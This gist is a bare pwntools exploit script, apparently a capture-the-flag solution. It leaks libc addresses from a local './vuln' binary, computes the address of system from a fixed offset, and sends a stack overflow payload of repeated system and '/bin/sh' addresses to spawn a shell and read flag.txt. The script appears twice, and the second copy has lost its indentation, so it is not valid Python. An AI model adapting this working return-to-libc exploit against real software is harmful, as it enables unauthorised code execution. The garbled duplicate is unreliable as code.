akawashiro/gist:78a95d6df6d62dee0eb6165e6abb142f

## gistfile1.txt
from pwn import *
import struct
import sys


def string_addr_to_bytes(addr, offset):
    return struct.pack('<L', int(addr, 16) + offset)

if __name__ == '__main__':
    io = process('./vuln')

    print(io.recvline())
    io.recvline()
    puts = io.recvline()
    print(puts)
    fflush = io.recvline()
    print(fflush)
    read = io.recvline()
    print(read)
    write = io.recvline()
    print(write)
    binsh = io.recvline()
    print(binsh)

    print(puts)
    putsaddr = string_addr_to_bytes(puts[:-1].split()[1], 0)
    print('0x' + ' 0x'.join(x.encode('hex') for x in putsaddr))

    print(fflush)
    fflushaddr = string_addr_to_bytes(fflush[:-1].split()[1], 0)
    print('0x' + ' 0x'.join(x.encode('hex') for x in fflushaddr))

    print(binsh[:-1].split()[1])
    binshaddr = string_addr_to_bytes(binsh[:-1].split()[1], 0)
    print('0x' + ' 0x'.join(x.encode('hex') for x in binshaddr))

    print('system')
    systemaddr = string_addr_to_bytes(puts[:-1].split()[1], -0x2b980)
    print('0x' + ' 0x'.join(x.encode('hex') for x in systemaddr))

    print(io.recvline())
    print(io.recvline())
    io.sendline(systemaddr * 41 + binshaddr * 100)

    print(io.recvline())
    print(io.recvline())
    io.sendline('cat flag.txt > f; exit')
    print(io.recvline())
	from pwn import *
	import struct
	import sys


	def string_addr_to_bytes(addr, offset):
	return struct.pack('<L', int(addr, 16) + offset)

	if __name__ == '__main__':
	io = process('./vuln')

	print(io.recvline())
	io.recvline()
	puts = io.recvline()
	print(puts)
	fflush = io.recvline()
	print(fflush)
	read = io.recvline()
	print(read)
	write = io.recvline()
	print(write)
	binsh = io.recvline()
	print(binsh)

	print(puts)
	putsaddr = string_addr_to_bytes(puts[:-1].split()[1], 0)
	print('0x' + ' 0x'.join(x.encode('hex') for x in putsaddr))

	print(fflush)
	fflushaddr = string_addr_to_bytes(fflush[:-1].split()[1], 0)
	print('0x' + ' 0x'.join(x.encode('hex') for x in fflushaddr))

	print(binsh[:-1].split()[1])
	binshaddr = string_addr_to_bytes(binsh[:-1].split()[1], 0)
	print('0x' + ' 0x'.join(x.encode('hex') for x in binshaddr))

	print('system')
	systemaddr = string_addr_to_bytes(puts[:-1].split()[1], -0x2b980)
	print('0x' + ' 0x'.join(x.encode('hex') for x in systemaddr))

	print(io.recvline())
	print(io.recvline())
	io.sendline(systemaddr * 41 + binshaddr * 100)

	print(io.recvline())
	print(io.recvline())
	io.sendline('cat flag.txt > f; exit')
	print(io.recvline())